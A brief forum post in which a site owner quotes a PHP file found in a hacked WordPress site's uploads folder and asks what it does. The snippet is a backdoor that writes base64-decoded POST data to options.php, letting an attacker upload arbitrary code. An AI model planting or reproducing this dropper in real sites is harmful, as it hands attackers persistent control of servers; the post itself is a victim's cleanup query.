Replies: 0
Looking through a hacked website files via FTP, I saw the following in WP-content/uploads.php:
<?php
if (isset($_POST[‘da’])) {
file_put_contents(‘options.php’, base64_decode($_POST[‘da’]), LOCK_EX);
}
?>
I know base64_ isn’t kosher. I’m curious what they did or tried to do. I’m about to upload a new version and overwrite all. The blog was a few pages in posts but I still have the db files.
Actually, in retrospect, I’ll move all to a new folder then install a fresh copy. I need my theme but will check dates of all files.